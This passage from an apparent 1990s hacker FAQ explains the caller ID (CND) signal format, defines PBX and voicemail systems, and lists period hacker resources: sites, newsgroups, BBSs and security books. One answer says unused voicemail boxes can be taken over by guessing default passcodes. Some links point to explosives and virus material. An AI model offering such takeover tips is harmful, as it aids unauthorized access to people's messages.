  3348. | Seizure  |  Signal   |  Type     |  Length   |  Word(s)    | Word     |
  3349. | Signal   |           |  Word     |  Word     |             |          |
  3350.  
  3351. Channel Siezure Signal
  3352. ~~~~~~~~~~~~~~~~~~~~~~
  3353. The channel seizure is 30 continuous bytes of 55h (01010101) providing
  3354. a detectable alternating function to the CPE (i.e. the modem data
  3355. pump).
  3356.  
  3357. Carrier Signal
  3358. ~~~~~~~~~~~~~~
  3359. The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to
  3360. condition the receiver for data.
  3361.  
  3362. Message Type Word
  3363. ~~~~~~~~~~~~~~~~~
  3364. The message type word indicates the service and capability associated
  3365. with the data message.  The message type word for CND is 04h
  3366. (00000100).
  3367.  
  3368. Message Length Word
  3369. ~~~~~~~~~~~~~~~~~~~
  3370. The message length word specifies the total number of data words to
  3371. follow.
  3372.  
  3373. Data Words
  3374. ~~~~~~~~~~
  3375. The data words are encoded in ASCII and represent the following
  3376. information:
  3377.  
  3378. o  The first two words represent the month
  3379. o  The next two words represent the day of the month
  3380. o  The next two words represent the hour in local military time
  3381. o  The next two words represent the minute after the hour
  3382. o  The calling party's directory number is represented by the
  3383.    remaining  words in the data word field
  3384.  
  3385. If the calling party's directory number is not available to the
  3386. terminating central office, the data word field contains an ASCII "O".
  3387. If the calling party invokes the privacy capability, the data word
  3388. field contains an ASCII "P".
  3389.  
  3390. Checksum Word
  3391. ~~~~~~~~~~~~~
  3392. The Checksum Word contains the twos complement of the modulo 256 sum
  3393. of the other words in the data message (i.e., message type, message
  3394. length, and data words).  The receiving equipment may calculate the
  3395. modulo 256 sum of the received words and add this sum to the reveived
  3396. checksum word.  A result of zero generally indicates that the message
  3397. was correctly received.  Message retransmission is not supported.
  3398.  
  3399. Example CNS Single Data Message
  3400. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3401. An example of a received CND message, beginning with the message type
  3402. word, follows:
  3403.  
  3404. 04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51
  3405.  
  3406. 04h=  Calling number delivery information code (message type word)
  3407. 12h=  18 decimal; Number of data words (date,time, and directory
  3408.       number words)
  3409. ASCII 30,39= 09; September
  3410. ASCII 33,30= 30; 30th day
  3411. ASCII 31,32= 12; 12:00 PM
  3412. ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM)
  3413. ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling
  3414.       party's directory number
  3415. 51h=  Checksum Word
  3416.  
  3417. Data Access Arrangement (DAA) Requirements
  3418. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3419. To receive CND information, the modem monitors the phone line between
  3420. the first and second ring bursts without causing the DAA to go off
  3421. hook in the conventional sense, which would inhibit the transmission
  3422. of CND by the local central office.  A simple modification to an
  3423. existing DAA circuit easily accomplishes the task.
  3424.  
  3425. Modem Requirements
  3426. ~~~~~~~~~~~~~~~~~~
  3427. Although the data signalling interface parameters match those of a
  3428. Bell 202 modem, the receiving CPE need not be a Bell 202 modem.  A
  3429. V.23 1200 bps modem receiver may be used to demodulate the Bell 202
  3430. signal.  The ring indicate bit (RI) may be used on a modem to indicate
  3431. when to monitor the phone line for CND information.  After the RI bit
  3432. sets, indicating the first ring burst, the host waits for the RI bit
  3433. to reset.  The host then configures the modem to monitor the phone
  3434. line for CND information.
  3435.  
  3436. Signalling
  3437. ~~~~~~~~~~
  3438. According to Bellcore specifications, CND signalling starts as early
  3439. as 300 mS after the first ring burst and ends at least 475 mS before
  3440. the second ring burst
  3441.  
  3442. Applications
  3443. ~~~~~~~~~~~~
  3444. Once CND information is received the user may process the information
  3445. in a number of ways.
  3446.  
  3447. 1.  The date, time, and calling party's directory number can be
  3448.     displayed.
  3449.  
  3450. 2.  Using a look-up table, the calling party's directory number can be
  3451.     correlated with his or her name and the name displayed.
  3452.  
  3453. 3.  CND information can also be used in additional ways such as for:
  3454.  
  3455.     a.  Bulletin board applications
  3456.     b.  Black-listing applications
  3457.     c.  Keeping logs of system user calls, or
  3458.     d.  Implementing a telemarketing data base
  3459.  
  3460. References
  3461. ~~~~~~~~~~
  3462. For more information on Calling Number Delivery (CND), refer to
  3463. Bellcore publications TR-TSY-000030 and TR-TSY-000031.
  3464.  
  3465. To obtain Bellcore documents contact:
  3466.  
  3467.     Bellcore Customer Service
  3468.     60 New England Avenue, Room 1B252
  3469.     Piscataway, NJ   08834-4196
  3470.     (908) 699-5800
  3471.  
  3472.  
  3473. 28. What is a PBX?
  3474.  
  3475. A PBX is a Private Branch Exchange.  A PBX is a small telephone switch
  3476. owned by a company or organization.  Let's say your company has a
  3477. thousand employees.  Without a PBX, you would need a thousand phone
  3478. lines.  However, only 10% of your employees are talking on the phone
  3479. at one time.  What if you had a computer that automatically found an
  3480. outside line every time one of your employees picked up the telephone.
  3481. With this type of system, you could get by with only paying for one
  3482. hundred phone lines.  This is a PBX.
  3483.  
  3484.  
  3485. 29. What is a VMB?
  3486.  
  3487. A VMB is a Voice Mail Box.  A VMB is a computer that acts as an
  3488. answering machine for hundreds or thousands of users.  Each user will
  3489. have their own Voice Mail Box on the system.  Each mail box will have
  3490. a box number and a pass code.
  3491.  
  3492. Without a passcode, you will usually be able to leave messages to
  3493. users on the VMB system.  With a passcode, you can read messages and
  3494. administer a mailbox.  Often, mailboxes will exist that were created
  3495. by default or are no longer used.  These mailboxes may be taken over
  3496. by guessing their passcode.  Often the passcode will be the mailbox
  3497. number or a common number such as 1234.
  3498.  
  3499.  
  3500.  
  3501.  
  3502.  
  3503. Section C: Resources
  3504. ~~~~~~~~~~~~~~~~~~~~
  3505.  
  3506. 01. What are some ftp sites of interest to hackers?
  3507.  
  3508. N 198.69.103.23                                           (Mac)
  3509. N aeneas.mit.edu
  3510.   alex.sp.cs.cmu.edu      /links/security                 (Misc)
  3511. N alife.santafe.edu
  3512.   aql.gatech.edu          /pub                            (40Hex)
  3513. N asylum.sf.ca.us
  3514.   athena-dist.mit.edu     /pub/ATHENA                     (Athena Project)
  3515. N atlantis.utmb.edu
  3516.   bellcore.com                                            (Bellcore)
  3517.   camelot.usc.edu         /pub/cellular/DDIinfodemo       (Cellular)
  3518.   cert.org                                                (CERT)
  3519. N ciac.llnl.gov
  3520.   coast.cs.purdue.edu     /pub                            (Security/COAST)
  3521. N csrc.ncsl.nist.gov
  3522.   dartmouth.edu           /pub/security                   (Security)
  3523. N dg-rtp.dg.com
  3524. N ds.internic.net
  3525. N enlow.com
  3526.   freeside.com                                            (Phrack)
  3527.   ftp.3com.com            /mirrors/zip                    (ZipCrypt)
  3528.   ftp.3com.com            /Orange-Book                    (Orange Book)
  3529. N ftp.acns.nwu.edu
  3530. N ftp.alantec.com
  3531.   ftp.armory.com          /pub/user/kmartind              (H/P)
  3532. N ftp.armory.com          /pub/user/swallow
  3533. N ftp.c3.lanl.gov
  3534. N ftp.cc.rochester.edu
  3535. N ftp.cert.dfn.de                                         (FIRST)
  3536.   ftp.cic.net             /pub/e-serials/alphabetic/p/phrack (Zines)
  3537. N ftp.cisco.com
  3538.   ftp.clark.net           /pub/jcase                      (H/P)
  3539.   ftp.cnam.fr
  3540.   ftp.commerce.net        /pubs/standards/drafts/shttp.txt(Secure HyperText)
  3541. N ftp.cs.colorado.edu
  3542. N ftp.cs.ruu.nl
  3543.   ftp.cs.uwm.edu          /pub/comp-privacy               (Privacy Digest)
  3544. N ftp.cs.vu.nl
  3545. N ftp.cs.yale.edu
  3546.   ftp.csl.sri.com         /pub/nides                      (SRI)
  3547.   ftp.csua.berkeley.edu   /pub/cypherpunks                (Crypto)
  3548. N ftp.cyberspace.com      /pub/archive/defcon             (PhoneTag)
  3549. N ftp.delmarva.com
  3550. N ftp.dsi.unimi.it
  3551. N ftp.ee.lbl.gov
  3552. U ftp.eff.org             /pub/Publications/CuD           (EFF)
  3553.   ftp.elelab.nsc.co.jp    /pub/security                   (Security)
  3554.   ftp.etext.org                                           (Etext)
  3555. U ftp.fc.net              /pub/defcon                     (DefCon)
  3556. N ftp.fc.net              /pub/defcon/BBEEP               (BlueBeep)
  3557. N ftp.fh-berlin.de
  3558. N ftp.foobar.com
  3559. N ftp.funet.fi
  3560.   ftp.gate.net            /pub/users/laura
  3561.   ftp.gate.net            /pub/users/wakko
  3562.   ftp.greatcircle.com     /pub/firewalls                  (Firewalls)
  3563.   ftp.halcyon.com         /pub/cud                        (Zines)
  3564.   ftp.IEunet.ie           /pub/security                   (Security)
  3565. N ftp.ifi.uio.no
  3566. N ftp.info.fundp.ac.be
  3567. N ftp.informatik.uni-hamburg.de
  3568.   ftp.inoc.dl.nec.com     /pub/security                   (Security)
  3569. N ftp.isi.edu
  3570. U ftp.llnl.gov            /pub                            (CIAC)
  3571. N ftp.lysator.liu.se
  3572. N ftp.mcs.com             /mcsnet.users/crisadm           (Virii)
  3573. N ftp.microserve.net      /ppp-pop/strata/mac             (Mac)
  3574.   ftp.near.net            /security/archives/phrack       (Zines)
  3575. N ftp.nec.com
  3576.   ftp.netcom.com          /pub/br/bradleym                (Virii)
  3577. N ftp.netcom.com          /pub/da/daemon9
  3578.   ftp.netcom.com          /pub/va/vandal                  (DnA)
  3579.   ftp.netcom.com          /pub/zz/zzyzx                   (H/P)
  3580. N ftp.netsys.com
  3581.   ftp.ocs.mq.edu.au       /PC/Crypt                       (Crypto)
  3582.   ftp.paranoia.com        /pub/toneloc/tl110.zip          (ToneLoc)
  3583. N ftp.pop.psu.edu
  3584.   ftp.primus.com          /pub/armchair                   (Phoney)
  3585.   ftp.primus.com          /pub/security                   (Security)
  3586. N ftp.psy.uq.oz.au
  3587.   ftp.rahul.net           /pub/lps                        (Home of the FAQ)
  3588. N ftp.sert.edu.au
  3589. N ftp.sgi.com
  3590.   ftp.std.com             /archives/alt.locksmithing      (Locksmithing)
  3591.   ftp.std.com             /obi/Mischief/                  (MIT Guide to Locks)
  3592.   ftp.std.com             /obi/Phracks                    (Zines)
  3593.   ftp.sunet.se            /pub/network/monitoring         (Ethernet sniffers)
  3594.   ftp.sura.net            /pub/security                   (SURAnet)
  3595. N ftp.technet.sg
  3596.   ftp.tis.com             /pub                            (TIS)
  3597. N ftp.uspto.gov
  3598.   ftp.uu.net              /doc/literary/obi/Phracks       (Zines)
  3599. N ftp.uwp.edu                                             (Copy protection)
  3600. N ftp.vis.colostate.edu
  3601. N ftp.vix.com
  3602. N ftp.vortex.com
  3603.   ftp.warwick.ac.uk       /pub/cud                        (Zines)
  3604.   ftp.win.tue.nl          /pub/security                   (Security)
  3605.   ftp.winternet.com       /users/craigb                   (H/P)
  3606.   ftp.wustl.edu           /doc/EFF                        (EFF)
  3607.   furmint.nectar.cs.cmu.edu /security                     (Crypto)
  3608.   garbo.uwasa.fi          /pc/crypt                       (Crypto)
  3609. N gumby.dsd.trw.com
  3610. N hack-this.pc.cc.cmu.edu                                 (Back again!)
  3611. N hplyot.obspm.fr
  3612. N info.mcs.anl.gov
  3613. N jerico.usc.edu
  3614.   lcs.mit.edu             /telecom-archives               (Telecom archives)
  3615.   lod.amaranth.com                                        (Legion of Doom)
  3616. N l0pht.com                                               (The L0pht)
  3617. N mac.archive.umich.edu
  3618.   mary.iia.org            /pub/users/patriot              (Misc)
  3619. N monet.ccs.itd.umich.edu
  3620.   net.tamu.edu            /pub/security/TAMU              (Security)
  3621.   net23.com               /pub                            (Max Headroom)
  3622.   nic.ddn.mil             /scc                            (DDN Security)
  3623.   nic.funet.fi            /pub/doc/cud                    (Zines)
  3624. N oak.oakland.edu
  3625.   paradox1.denver.colorado.edu  /anonymous/text-files/pyrotechnics (Pyro)
  3626. N parcftp.xerox.com
  3627.   pyrite.rutgers.edu      /pub/security                   (Security)
  3628.   relay.cs.toronto.edu    /doc/telecom-archives           (Telecom)
  3629.   rena.dit.co.jp          /pub/security                   (Security)
  3630.   research.att.com        /dist/internet_security         (AT&T)
  3631.   ripem.msu.edu           /pub/crypt                      (Ripem)
  3632.   rs1.rrz.uni-koeln.de                                    (Wordlists)
  3633.   rtfm.mit.edu                                            (Etext)
  3634.   rtfm.mit.edu            /pub/usenet-by-group            (Usenet FAQ's)
  3635.   sable.ox.ac.uk                                          (Wordlists)
  3636. N samadams.princeton.edu
  3637.   scss3.cl.msu.edu        /pub/crypt                      (Crypto)
  3638. N sierra.stanford.edu
  3639.   spy.org                                                 (CSC)
  3640.   suburbia.apana.org.au   /pub/unix/security              (Security)
  3641. N sunsolve1.sun.com
  3642. N tam.cs.ucdavis.edu
  3643. N technion.ac.il
  3644.   theta.iis.u-tokyo.ac.jp /pub1/security                  (Security)
  3645. N thumper.bellcore.com
  3646.   titania.mathematik.uni-ulm.de /pub/security             (Security)
  3647. N toxicwaste.mit.edu      /pub/rsa129/README              (Breaking RSA)
  3648.   uceng.uc.edu            /pub/kerberos.documentation     (Kerberos)
  3649. N ugle.unit.no
  3650. N vic.cc.purdue.edu
  3651. N whacked.l0pht.com                                       (Mac + H/P)
  3652.   wimsey.bc.ca            /pub/crypto                     (Crypto)
  3653.  
  3654.  
  3655. 02. What are some fsp sites of interest to hackers?
  3656.  
  3657.   Third Stone From the Sun  132.241.180.91 6969
  3658.  
  3659.  
  3660. 03. What are some newsgroups of interest to hackers?
  3661.  
  3662.   alt.2600                Do it 'til it hertz
  3663.   alt.2600.hope.tech      Technology concerns for Hackers on Planet Earth 1994
  3664.   alt.cellular
  3665. N alt.cellular-phone-tech
  3666. N alt.comp.virus
  3667.   alt.cyberpunk           High-tech low-life.
  3668.   alt.cyberspace          Cyberspace and how it should work.
  3669.   alt.dcom.telecom        Discussion of telecommunications technology
  3670.   alt.engr.explosives     [no description available]
  3671.   alt.hackers             Descriptions of projects currently under development
  3672.   alt.locksmithing        You locked your keys in *where*?
  3673.   alt.hackers.malicious   The really bad guys - don't take candy from them
  3674. N alt.ph.uk
  3675.   alt.privacy.anon-server Tech. & policy matters of anonymous contact servers
  3676.   alt.radio.pirate        Hide the gear, here comes the magic station-wagons.
  3677.   alt.radio.scanner       Discussion of scanning radio receivers.
  3678. N alt.satellite.tv.europe
  3679.   alt.security            Security issues on computer systems
  3680.   alt.security.index      Pointers to good stuff in misc.security (Moderated)
  3681.   alt.security.keydist    Exchange of keys for public key encryption systems
  3682.   alt.security.pgp        The Pretty Good Privacy package
  3683.   alt.security.ripem      A secure email system illegal to export from the US
  3684.   comp.dcom.cellular      [no description available]
  3685.   comp.dcom.telecom       Telecommunications digest (Moderated)
  3686.   comp.dcom.telecom.tech  [no description available]
  3687.   comp.org.cpsr.announce  Computer Professionals for Social Responsibility
  3688.   comp.org.cpsr.talk      Issues of computing and social responsibility
  3689.   comp.org.eff.news       News from the Electronic Frontiers Foundation
  3690.   comp.org.eff.talk       Discussion of EFF goals, strategies, etc.
  3691.   comp.protocols.kerberos The Kerberos authentification server
  3692.   comp.protocols.tcp-ip   TCP and IP network protocols
  3693.   comp.risks              Risks to the public from computers & users
  3694.   comp.security.announce  Announcements from the CERT about security
  3695.   comp.security.misc      Security issues of computers and networks
  3696.   comp.security.unix      Discussion of Unix security
  3697.   comp.virus              Computer viruses & security (Moderated)
  3698.   de.org.ccc              Mitteilungen des CCC e.V.
  3699.   misc.security           Security in general, not just computers (Moderated)
  3700.   rec.pyrotechnics        Fireworks, rocketry, safety, & other topics
  3701.   rec.radio.scanner       [no description available]
  3702.   rec.video.cable-tv      Technical and regulatory issues of cable television
  3703.   sci.crypt               Different methods of data en/decryption
  3704.  
  3705.  
  3706. 04. What are some telnet sites of interest to hackers?
  3707.  
  3708.   ntiabbs.ntia.doc.gov                  (NTIA)
  3709. N l0pht.com                             (The L0pht)
  3710. N sfpg.gcomm.com                        (The Floating Pancreas)
  3711. U telnet lust.isca.uiowa.edu 2600       (underground bbs) (temporarily down)
  3712.  
  3713.  
  3714. 05. What are some gopher sites of interest to hackers?
  3715.  
  3716.   ba.com                  (Bell Atlantic)
  3717.   csrc.ncsl.nist.gov      (NIST Security Gopher)
  3718.   gopher.acm.org          (SIGSAC (Security, Audit & Control))
  3719.   gopher.cpsr.org         (Computer Professionals for Social Responsibility)
  3720.   gopher.cs.uwm.edu
  3721.   gopher.eff.org          (Electonic Frontier Foundation)
  3722.   gw.PacBell.com          (Pacific Bell)
  3723.   iitf.doc.gov            (NITA -- IITF)
  3724.   oss.net                 (Open Source Solutions)
  3725.   spy.org                 (Computer Systems Consulting)
  3726.   wiretap.spies.com       (Wiretap)
  3727.  
  3728.  
  3729. 06. What are some World wide Web (WWW) sites of interest to hackers?
  3730. N http://alumni.caltech.edu/~dank/isdn/           (ISDN)
  3731.   http://aset.rsoc.rockwell.com                   (NASA/MOD AIS Security)
  3732.   http://aset.rsoc.rockwell.com/exhibit.html      (Tech. for Info Sec)
  3733. N http://att.net/dir800                           (800 directory)
  3734.   http://ausg.dartmouth.edu/security.html         (Security)
  3735.   http://cs.purdue.edu/coast/coast.html           (Coast)
  3736.   http://csrc.ncsl.nist.gov                       (NIST)
  3737. U http://dhp.com/~pluvius
  3738. U http://dfw.net/~aleph1                          (Eubercrackers)
  3739.   http://draco.centerline.com:8080/~franl/crypto.html (Crypto)
  3740.   http://everest.cs.ucdavis.edu/Security.html     (Security)
  3741.   http://everest.cs.ucdavis.edu/slides/slides.html(Security Lab Slides)
  3742.   http://ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html  (CSSCR)
  3743.   http://first.org                                (FIRST)
  3744.   http://ftp.tamu.edu/~abr8030/security.html      (Security)
  3745.   http://hightop.nrl.navy.mil/potpourri.html      (Security)
  3746.   http://hightop.nrl.navy.mil/rainbow.html        (Rainbow Books)
  3747. N http://ice-www.larc.nasa.gov/ICE/papers/hacker-crackdown.html (Sterling)
  3748. N http://ice-www.larc.nasa.gov/ICE/papers/nis-requirements.html (ICE NIS)
  3749.   http://info.bellcore.com/BETSI/betsi.html       (Betsi)
  3750.   http://infosec.nosc.mil/infosec.html            (SPAWAR INFOSEC)
  3751.   http://l0pht.com                                (The l0pht)
  3752. N http://l0pht.com/~oblivion/IIRG.html            (Phantasy Magazine)
  3753. N http://mindlink.jolt.com                        (The Secrets of LockPicking)
  3754.   http://mls.saic.com                             (SAIC MLS)
  3755.   http://naic.nasa.gov/fbi/FBI_homepage.html      (FBI Homepage)
  3756.   http://nasirc.hq.nasa.gov                       (NASA ASIRC)
  3757.   http://ophie.hughes.american.edu/~ophie
  3758. N http://ripco.com:8080/~glr/glr.html             (Full Disclosure)
  3759. N http://spy.org                                  (CSC)
  3760.   http://tansu.com.au/Info/security.html          (Comp and Net Security)
  3761.   http://the-tech.mit.edu                         (LaMacchia case info)
  3762. N http://ucs.orst.edu:8001/mintro.html            (Micro Power Broadcasting)
  3763.   http://wintermute.itd.nrl.navy.mil/5544.html    (Network Security)
  3764.   http://www.aads.net                             (Ameritech)
  3765.   http://www.alw.nih.gov/WWW/security.html        (Unix Security)
  3766.   http://www.artcom.de/CCC                        (CCC Homepage)
  3767.   http://www.aspentec.com/~frzmtdb/fun/hacker.html
  3768. N http://www.aus.xanadu.com:70/1/EFA              (EFF Australia)
  3769.   http://www.ba.com                               (Bell Atlantic)
  3770.   http://www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html(X-Win)
  3771.   http://www.bell.com                             (MFJ Task Force)
  3772.   http://www.bellcore.com/SECURITY/security.html  (Bellcore Security Products)
  3773.   http://www.brad.ac.uk/~nasmith/index.html
  3774.   http://www.bst.bls.com                          (BellSouth)
  3775.   http://www.c3.lanl.gov/~mcn                     (Lanl)
  3776. N http://www.cert.dfn.de/                         (German First Team)
  3777.   http://www.commerce.net/information/standards/drafts/shttp.txt (HyperText)
  3778.   http://www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html
  3779.   http://www.cpsr.org/home                        (CPSR)
  3780. N http://www.cs.tufts.edu/~mcable/cypher/alerts/alerts.html (Cypherpunk)
  3781. N http://www.cs.tufts.edu/~mcable/HackerCrackdown (Hacker Crackdown)
  3782.   http://www.cs.umd.edu/~lgas
  3783.   http://www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html (Security)
  3784.   http://www.csd.harris.com/secure_info.html      (Harris)
  3785.   http://www.csl.sri.com                          (SRI Computer Science Lab)
  3786. N http://www.cybercafe.org/cybercafe/pubtel/pubdir.html (CyberCafe)
  3787.   http://www.datafellows.fi                       (Data Fellows)
  3788.   http://www.delmarva.com/raptor/raptor.html      (Raptor Network Isolator)
  3789.   http://www.demon.co.uk/kbridge                  (KarlBridge)
  3790.   http://www.digicash.com/ecash/ecash-home.html   (Digital Cash)
  3791.   http://www.digital.com/info/key-secure-index.html(Digital Secure Systems)
  3792.   http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html(Bugtraq)
  3793.   http://www.eecs.nwu.edu/~jmyers/ids/index.html  (Intrusion Detection Systems)
  3794. N http://www.eff.org/papers.html                  (EFF)
  3795.   http://www.engin.umich.edu/~jgotts/boxes.html   (Box info)
  3796. U http://www.engin.umich.edu/~jgotts/underground/hack-faq.html(This document)
  3797.   http://www.ensta.fr/internet/unix/sys_admin     (System administration)
  3798. N http://www.etext.org/Zines/                     (Zines)
  3799.   http://www.fc.net/defcon                        (DefCon)
  3800. N http://www.fedworld.gov                         (Federal Government)
  3801. N http://www.first.org/first/                     (FIRST)
  3802. N http://www.getnet.com/crak or                   (CRAK Software)
  3803.   http://www.greatcircle.com                      (Great Circle Associates)
  3804.   http://www.hpcc.gov/blue94/section.4.6.html     (NSA)
  3805.   http://www.ic.gov                               (The CIA)
  3806. N http://www.indirect.com/www/johnk/              (CRAK Software)
  3807.   http://www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security)
  3808.   http://www.lysator.liu.se:7500/terror/thb_title.html (Terrorists Handbook)
  3809.   http://www.lysator.liu.se:7500/mit-guide/mit-guide.html (Lockpicking Guide)
  3810. N http://www.mpr.ca/                              (MPR Teltech Ltd)
  3811.   http://www.net23.com                            (Max Headroom)
  3812.   http://www.nist.gov                             (NIST)
  3813. N http://www.ntt.jp                               (Nippon Telephone)
  3814.   http://www.pacbell.com                          (Pacific Bell)
  3815.   http://www.paranoia.com/mthreat                 (ToneLoc)
  3816.   http://www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP)
  3817.   http://www.phantom.com/~king                    (Taran King)
  3818. N http://www.primenet.com/~kludge/haqr.html       (Kludge)
  3819. U http://www.quadralay.com/www/Crypt/Crypt.html   (Quadralay Cryptography)
  3820. N http://www.qualcomm.com/cdma/wireless.html      (Qualcomm CDMA)
  3821.   http://www.research.att.com                     (AT&T)
  3822.   http://www.rsa.com                              (RSA Data Security)
  3823.   http://www.satelnet.org/~ccappuc
  3824.   http://www.service.com/cm/uswest/usw1.html      (USWest)
  3825.   http://www.shore.net/~oz/welcome.html           (Hack TV)
  3826.   http://www.spy.org                              (Computer Systems Consulting)
  3827.   http://www.sri.com                              (SRI)
  3828.   http://www.tansu.com.au/Info/security.html      (Security Reference Index)
  3829.   http://www.tis.com                              (Trusted Information Systems)
  3830.   http://www.tri.sbc.com                          (Southwestern Bell)
  3831.   http://www.uci.agh.edu.pl/pub/security          (Security)
  3832.   http://www.umcc.umich.edu/~doug/virus-faq.html  (Virus)
  3833. N http://www.usfca.edu/crackdown/crack.html       (Hacker Crackdown)
  3834.   http://www.wam.umd.edu/~ankh/Public/devil_does_unix
  3835.   http://www.wiltel.com                           (Wiltel)
  3836. N http://www.winternet.com/~carolann/dreams.html
  3837.   http://www.wired.com                            (Wired Magazine)
  3838.  
  3839.  
  3840. 07. What are some IRC channels of interest to hackers?
  3841.  
  3842.   #2600
  3843.   #cellular
  3844.   #hack
  3845.   #phreak
  3846.   #linux
  3847.   #realhack
  3848.   #root
  3849.   #unix
  3850.   #warez
  3851.  
  3852.  
  3853. 08. What are some BBS's of interest to hackers?
  3854.  
  3855. N Rune Stone              (203)832-8441
  3856.   Hacker's Haven          (303)343-4053
  3857.   Independent Nation      (315)656-4179
  3858. N Ut0PiA                  (315)656-5135
  3859.   underworld_1994.com     (514)683-1894
  3860.   Digital Fallout         (516)378-6640
  3861.   Alliance Communications (612)251-8596
  3862. N Maas-Neotek             (617)855-2923
  3863.   Apocalypse 2000         (708)676-9855
  3864.   K0dE Ab0dE              (713)579-2276
  3865.   fARM R0Ad 666           (713)855-0261
  3866.   
  3867.  
  3868. 09. What are some books of interest to hackers?
  3869.  
  3870. General Computer Security
  3871. ~~~~~~~~~~~~~~~~~~~~~~~~~
  3872.   Computer Security Basics
  3873.   Author: Deborah Russell and G.T. Gengemi Sr.
  3874.   Publisher: O'Reilly & Associates, Inc.
  3875.   Copyright Date: 1991
  3876.   ISBN: 0-937175-71-4
  3877.  
  3878.         This is an excellent book.  It gives a broad overview of
  3879.         computer security without sacrificing detail.  A must read for
  3880.         the beginning security expert.
  3881.  
  3882.   Computer Security Management
  3883.   Author: Karen Forcht
  3884.   Publisher: Boyd and Fraser
  3885.   Copyright Date: 1994
  3886.   ISBN: 0-87835-881-1
  3887.  
  3888.   Information Systems Security
  3889.   Author: Philip Fites and Martin Kratz
  3890.   Publisher: Van Nostrad Reinhold
  3891.   Copyright Date: 1993
  3892.   ISBN: 0-442-00180-0
  3893.  
  3894.   Computer Related Risks
  3895.   Author: Peter G. Neumann
  3896.   Publisher: Addison-Wesley
  3897.   Copyright Date: 1995
  3898.   ISBN: 0-201-55805-X
  3899.  
  3900.   Computer Security Management
  3901.   Author: Karen Forcht
  3902.   Publisher: boyd & fraser publishing company
  3903.   Copyright Date: 1994
  3904.   ISBN: 0-87835-881-1
  3905.  
  3906. N The Stephen Cobb Complete Book of PC and LAN Security
  3907.   Author: Stephen Cobb
  3908.   Publisher: Windcrest Books
  3909.   Copyright Date: 1992
  3910.   ISBN: 0-8306-9280-0 (hardback) 0-8306-3280-8 (paperback)
  3911.  
  3912. N Security in Computing
  3913.   Author: Charles P. Pfleeger
  3914.   Publisher: Prentice Hall
  3915.   Copyright Date: 1989
  3916.   ISBN: 0-13-798943-1.
  3917.  
  3918. N Building a Secure Computer System
  3919.   Author: Morrie Gasser
  3920.   Publisher: Van Nostrand Reinhold Co., New York.
  3921.   Copyright Date:
  3922.   ISBN: 0-442-23022-2
  3923.  
  3924. N Modern Methods for Computer Security
  3925.   Author: Lance Hoffman
  3926.   Publisher: Prentice Hall
  3927.   Copyright Date: 1977
  3928.   ISBN:
  3929.  
  3930. N Windows NT 3.5 Guidelines for Security, Audit and Control
  3931.   Author:
  3932.   Publisher: Microsoft Press
  3933.   Copyright Date:
  3934.   ISBN: 1-55615-814-9
  3935.  
  3936.  
  3937. Unix System Security
  3938. ~~~~~~~~~~~~~~~~~~~~
  3939.   Practical Unix Security
  3940.   Author: Simson Garfinkel and Gene Spafford
  3941.   Publisher: O'Reilly & Associates, Inc.
  3942.   Copyright Date: 1991
  3943.   ISBN: 0-937175-72-2
  3944.  
  3945.         Finally someone with a very firm grasp of Unix system security
  3946.         gets down to writing a book on the subject.  Buy this book.
  3947.         Read this book.
  3948.  
  3949.   Firewalls and Internet Security
  3950.   Author: William Cheswick and Steven Bellovin
  3951.   Publisher: Addison Wesley
  3952.   Copyright Date: 1994
  3953.   ISBN: 0-201-63357-4
  3954.  
  3955.   Unix System Security
  3956.   Author: Rik Farrow
  3957.   Publisher: Addison Wesley
  3958.   Copyright Date: 1991
  3959.   ISBN: 0-201-57030-0
  3960.  
  3961.   Unix Security: A Practical Tutorial
  3962.   Author: N. Derek Arnold
  3963.   Publisher: McGraw Hill
  3964.   Copyright Date: 1993
  3965.   ISBN: 0-07-002560-6
  3966.  
  3967.   Unix System Security: A Guide for Users and Systems Administrators
  3968.   Author: David A. Curry
  3969.   Publisher: Addison-Wesley
  3970.   Copyright Date: 1992
  3971.   ISBN: 0-201-56327-4
  3972.  
  3973.   Unix System Security
  3974.   Author: Patrick H. Wood and Stephen G. Kochan
  3975.   Publisher: Hayden Books
  3976.   Copyright Date: 1985
  3977.   ISBN: 0-672-48494-3
  3978.  
  3979.   Unix Security for the Organization
  3980.   Author: Richard Bryant
  3981.   Publisher: Sams
  3982.   Copyright Date: 1994
  3983.   ISBN: 0-672-30571-2
  3984.  
  3985.  
  3986. Network Security
  3987. ~~~~~~~~~~~~~~~~
  3988.   Network Security Secrets
  3989.   Author: David J. Stang and Sylvia Moon
  3990.   Publisher: IDG Books
  3991.   Copyright Date: 1993
  3992.   ISBN: 1-56884-021-7
  3993.  
  3994.         Not a total waste of paper, but definitely not worth the
  3995.         $49.95 purchase price.  The book is a rehash of previously
  3996.         published information.  The only secret we learn from reading
  3997.         the book is that Sylvia Moon is a younger woman madly in love
  3998.         with the older David Stang.
  3999.  
  4000.   Complete Lan Security and Control
  4001.   Author: Peter Davis
  4002.   Publisher: Windcrest / McGraw Hill
  4003.   Copyright Date: 1994
  4004.   ISBN: 0-8306-4548-9 and 0-8306-4549-7
  4005.  
  4006.   Network Security
  4007.   Author: Steven Shaffer and Alan Simon
  4008.   Publisher: AP Professional
  4009.   Copyright Date: 1994
  4010.   ISBN: 0-12-638010-4
  4011.  
  4012.  
  4013. Cryptography
  4014. ~~~~~~~~~~~~
  4015.   Applied Cryptography: Protocols, Algorithms, and Source Code in C
  4016.   Author: Bruce Schneier
  4017.   Publisher: John Wiley & Sons
  4018.   Copyright Date: 1994
  4019.   ISBN: 0-471-59756-2
  4020.  
  4021.         Bruce Schneier's book replaces all other texts on
  4022.         cryptography.  If you are interested in cryptography, this is
  4023.         a must read.  This may be the first and last book on
  4024.         cryptography you may ever need to buy.
  4025.  
  4026.   Cryptography and Data Security
  4027.   Author: Dorothy Denning
  4028.   Publisher: Addison-Wesley Publishing Co.
  4029.   Copyright Date: 1982
